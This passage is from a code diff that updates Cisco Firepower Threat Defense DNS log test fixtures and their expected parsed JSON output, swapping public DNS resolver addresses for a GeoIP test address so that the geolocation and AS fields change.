siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 205.251.196.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299 diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json index fd89ffb2288..6c4c303ea09 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json @@ -13,24 +13,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 145, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -78,7 +81,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -87,8 +90,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:21:56.350924300Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70", + "ingested": "2021-12-09T13:35:02.912948400Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -118,7 +121,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -159,24 +162,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 193, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -224,7 +230,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -233,8 +239,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:21:56.350939100Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299", + "ingested": "2021-12-09T13:35:02.912957800Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -265,7 +271,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -307,24 +313,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - 